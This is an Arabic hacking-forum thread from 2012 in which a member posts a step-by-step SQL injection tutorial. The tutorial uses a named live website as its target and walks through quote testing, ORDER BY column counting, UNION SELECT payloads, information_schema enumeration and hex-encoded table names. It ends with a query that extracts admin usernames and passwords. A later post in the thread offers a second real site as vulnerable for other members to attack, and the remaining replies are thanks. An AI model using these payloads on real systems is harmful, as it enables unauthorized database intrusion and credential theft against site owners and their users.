التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-10-2012, 12:48 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

.... شراح عن التحقين المواقع عبر طريقه التحقين


بسم الله الرحمن الرحيم

(( 2011 مرحبا بكم في دورة اختراق المواقع والسيرفرات))

محمد50 المقدم من طرف

|================================================= ====|
sql استغلال ثغرات
|================================================= ====|


هي الاكثر انتشار sql ثغرات


أولا هده هي الثغرة


http://packetstormsecurity.org/files...diacon-sql.txt


أنا عندي موقع مصاب

http://wtbazar.com/selloffers.php?pg=52&cid=0

الان نبدأ على بركة الله الاستغلال وسيكون على مراحل

------------------------------------------------------------

اضافة علامة "'" بعد المتغير لتأكد من اصابة الموقع
والمتغير هو الرقع الدي بعد =

لي الاسف حتى المواقع العربية مصابة

Warning: mysql_fetch_array():

نشوف موقعنا


^^ تمام الموقع مصاب

------------------------------------------------------------

order by x بعد المتغير نكتب

لكشف عدد الاعمدة في الموقع

نلاحط أن عدد سطور الاخطاء 4

أصبحو 2 عند وضع 4 أعمدة نبقى على هدا المنوال حتى نصل للعمود الاكبر التي يكون فيه 2 اخطاء

طبعا ليس دائما

العمود المصاب هو 8



------------------------------------------------------------

union select 1,2,3,4,5,6,7,8-- الان نضيف

لكشف العمود المصاب


العمود المصاب هو وقم 2

ولنتأكد أكثر

نكتب أي شئ مكان رقم 2 ادا ظهر نتأكد من اصابة العمود "طبعا في بعض الحالات فقط"

------------------------------------------------------------
versionنكتب مكان رقم2 ()

union select 1,version(),3,4,5,6,7,8--

لاظهار اصدار القاعدة

5.0.92-community

------------------------------------------------------------
"نطبق هدا الامر بعد الاعمدة"


From+information_schema.tables+where+table_schema= database()

يصبح كالتالي

union select 1,2,3,4,5,6,7,8+From+information_schema.tables+whe re+table_schema=database()


بعدها يظهر لنا أن العمود 2 مصاب 100%




------------------------------------------------------------

بعدها للاظهار محتواه نكتب الامر مكـان العمود


Group_concat(table_name)


ستظهر لنا جداول العمود نشفر كلمة الادمن بالهكس ندهب لجوجل ونبحث عن موقع تشفير نكتب

text to hex

بالتشفير الدى حصلنا عليه يصبح الرابط كالاتي database() نستبدل كلمة

union select 1,Group_concat(table_name),3,4,5,6,7,8+From+inform ation_schema.tables+where+table_schema=0x7362626c6 56164735f61646d696e

طبعا لا ننسى قبلها

0x

------------------------------------------------------------




name بـ schema نستبدل كلمة

columns بـ tables ونستبدل كلمة

column بـ table وأيضا نستبدل كلمة

فيصبح الرابط

union select 1,Group_concat(column_name),3,4,5,6,7,8+From+infor mation_schema.columns+where+table_name=0x7362626c6 56164735f61646d696e



النت ضعيف



------------------------------------------------------------

ظهر لنا محتوى الجدول

sb_id,sb_admin_name,sb_pwd

الان نستبدل الاوامر بالشكل التالي

sb_admin_name,sb_pwd بمعلومات الصفوف وهي column_name نستبدل

,0x3a, بهده العلامة sb_pwd و sb_admin_name ما ننسى نفصل بين

يصبح الرابط

union select 1,Group_concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6, 7,8+From+information_schema.columns+where+table_na me=0x7362626c656164735f61646d696e



كان من المفروض يعطنا الايميل وكلمة السر


المهم هده هي أخر خطوة

والفكرة واضحة



------------------------------------------------------------

: ملاحظة


order+by+number في بعض المواقع يقوم الموقع بعمل رديكسون مباشرة بعد اضافة

لتخلص من هدا المشكل نبقى علامة ' ثم نحقن الموقع

------------------------------------------------------------




انتهى بحمد الله

والله يا الغالين والله انا اليوم ولي الحمد الله انا بحمد الله والله يا الخوني انا والله انت علم
وهل تصدقون والله كل يوم انا تعبان من النت والله يا الغالين
على العموم والله اتمناء من الله انكم تكونون بخير ما انا تعبان من نت والله
باااااااااااااااااااي يا الغالين
باااااااااااااااااي: bye1:



avhp uk hgjprdk hgl,hru ufv 'vdri

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
قديم 03-10-2012, 12:51 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


فين الردود يا الغاليين؟؟؟؟\

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
قديم 03-11-2012, 12:00 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


هاذ موقع لكم يا الغالين بهم تغرت sql
الاول
http://www.ramsystem.es/secc.php?id=1%27
لكم
باااااااااااااااي

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
قديم 03-11-2012, 12:10 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
؟؟فين الردود يا الغاليين؟؟
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
قديم 03-16-2012, 12:22 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية yosfux
 

 

 
إحصائية العضو






yosfux غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
yosfux is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


tnx

   

رد مع اقتباس
قديم 03-23-2012, 09:35 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
المفترس
:: مهووس الكمبيوتر ::
 
الصورة الرمزية المفترس
 

 

 
إحصائية العضو





المفترس غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المفترس is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


الله يعطيك العافية اخي
وبارك الله فيك
والمرة جاي اعمل مواضيع لوجه الله لاتستنى ردود
لان في هدا الوقت الرد اصبح مشقة على الناس

التوقيع

Almoftarse over from here

تم ترك الهاكر والبرمجة وكل ما يخص الكمبيوتر لمدة عام

لا يوجد في هدا العالم صداقة الا صداقة الوالدين وبعدين صداقة العقل وبعدهما صداقة المال والنفود

 

   

رد مع اقتباس
قديم 03-23-2012, 10:24 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية 3xxx
 

 

 
إحصائية العضو







3xxx غير متواجد حالياً

إرسال رسالة عبر Skype إلى 3xxx

 

 

إحصائية الترشيح

عدد النقاط : 30
3xxx is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


يعطيك العافيه

التوقيع

القادم اجمل واقوى من السابق

hackers

 

   

رد مع اقتباس
قديم 04-02-2012, 01:05 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو






°l||l° نور الظلام °l||l° غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
°l||l° نور الظلام °l||l° is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


يعطيك العافيه على الشرح
موفق

التوقيع

من لايعتبرني مكسبا له لن اعتبر غيابه خسارة لي........
ومن لم يقبل بي كحلا لعينه فلن اقبل به نعلا لقدمي .......
________________________________________--
لعن الله كل جرار قواد وقواده يقود على عرضه وعرض غيره
اتفوه على هي الوجيه الي تجيب الهم ولا تفكر الى بااخبث وانجس
شي ....
الكلام موجه للي يكرهوني ونفوسهم دنيئه على الاقل حافضه شرفي
وماشيه بخير اهو افضل من الي يجرر ويتمحن بالنت وما خفي اعظم

 

   

رد مع اقتباس
قديم 04-05-2012, 08:43 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


والله شكرن على الدار الجميل يا الغاليين
على العموم شكرن من دخل على الموضوع حق انا
ومن شارك في الردود
شكرن

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
قديم 04-30-2012, 10:38 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية abdoog
 

 

 
إحصائية العضو





abdoog غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdoog is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


والله شرح روووووعة زي صاحبها تستحق كل التقييم

التوقيع


=============================
هما طريقان


http://im29.gulfup.com/WRLb10.jpg



=============================






 

   

رد مع اقتباس
قديم 05-09-2012, 07:24 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

افتراضي رد: شراح عن التحقين المواقع عبر طريقه التحقين


العفو عند المقدره شكر على الردود

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 08:56 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0